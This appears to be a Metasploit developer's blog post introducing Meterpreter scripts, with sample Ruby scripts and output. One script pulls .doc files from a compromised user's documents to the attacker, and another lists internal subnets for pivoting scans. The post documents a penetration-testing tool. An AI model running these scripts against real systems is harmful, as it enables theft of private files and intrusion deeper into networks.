Last updated at Wed, 26 Jul 2017 18:30:54 GMT
One of the steps involved in completely automating exploitation is post-exploitation automation. This is where steps are taken to automate the tasks that are performed after successfully exploiting a target host. The meterpreter implementation in Metasploit 3.0 defines a programmatic interface for the attacker that helps to faciliate this automation, such as by making it easy to interact with processes, networking, and the file system. While all of this has been present for some time, we have only recently added support for Meterpreter scripts. The purpose of meterpreter scripts are to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. In the long term, we'll make it so that these scripts can run automatically each time a Meterpreter session is created, thus making the post-exploitation process completely automated.
Meterpreter scripts themselves are easy to write. The hardest part is getting to know what the current API provides. All of that information can be found in the API documentation. To better illustrate what meterpreter scripts can do, let's implement one that automatically downloads all .doc files from the My Documents directory of the exploited user process on the remote server. Here's what that script might look like:
client.fs.dir.entries('%USERPROFILE%\My Documents').grep(/doc$/i).each { |doc|
dst = ::Dir.tmpdir ::File::Separator doc
print_line("Downloading #{doc} to #{dst}")
client.fs.file.download_file(dst, "%USERPROFILE%\\My Documents\\#{doc}")
}The output to this script might look something like:
meterpreter > run download_doc_files
Downloading Personal Information.doc to /tmp/Personal Information.doc
Downloading Secret Passwords.doc to /tmp/Secret Passwords.docOf course, other more interesting things can be done as well. Let's say you wanted to automatically determine local subnets on the remote host after you've successfully exploited a machine. This information could then, at some point, be fed back into the exploitation automation database so that port scanner auxiliary modules could start scanning for new hosts. The scans would all pivot through the now-compromised meterpreter instance. To accomplish the simple task of finding local subnets, a meterpreter script could be used that looks like the code shown below:
client.net.config.each_route { |route|
next if route.subnet !~ /^(192\.168|172\.|10\.)/
next if route.netmask == '255.255.255.255'
print_line("Local subnet: #{route.subnet}/#{route.netmask}")
}The output to this might look something like:
meterpreter > run get_local_subnets
Local subnet: 10.44.200.0/255.255.255.0
Local subnet: 192.168.49.0/255.255.255.0
Local subnet: 192.168.117.0/255.255.255.0While these scripts illustrate very simple tasks, it is equally possible to perform more complicated operations, such as uploading files to the remote host, modifying the registry, and so on. If the existing meterpreter API isn't powerful enough to accomplish a particular need, it can be extended dynamically at runtime with other custom code. As we move toward the future, the existing exploitation automation and post-exploitation automation should start to feed off one another.
Hopefully that's a good enough introduction to meterpreter scripts. On another random note, I've indefinitely stopped work on the Metasploit Reversing Toolkit (as of a few months ago) for a number of reasons, not the least of which involves a severe lack of time. With that said, I am spending time working, in a similar vein, on another tool that I hope will turn out to be a bit more fruitful. I'll talk about that more at a later date. While MSRT in its current form is far from useful, very minimalist, and in severe need of improvements across the board, I figured I might as well release what code I have in the event that it might be useful to others. Beware, though, that it's hardly useful :) Although, you will find a functional ruby wrapper for jt's disassembler in there. You can download it here
.
